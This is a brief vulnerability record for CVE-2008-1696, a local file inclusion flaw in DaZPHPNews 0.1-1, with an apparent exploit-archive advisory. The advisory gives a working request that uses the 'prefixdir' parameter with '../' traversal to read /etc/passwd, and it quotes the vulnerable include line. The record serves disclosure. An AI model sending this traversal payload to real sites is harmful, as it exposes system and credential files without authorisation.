CVE-2008-1696

Directory traversal vulnerability in makepost.php in DaZPHPNews 0.1-1, when registerglobals is enabled and magicquotesgpc is disabled, allows remote attackers to include and execute arbitrary local files via a .. dot dot in the prefixdir parameter...

DaZPHP 0.1 - 'prefixdir' Local File Inclusion

Script Name : DaZPHP Download : http://sourceforge.net/project/showfiles.php?groupid=132192 Vul CodeExample : http://site/Path/makepost.php?prefixdir=../../../../../../etc/passwd Error : include "./".$prefixdir."/DaZPHPNews-0.1-1/makepost.php"; Greetz : Kezzap66345 - Str0ke - Dread 35 milw0rm.com...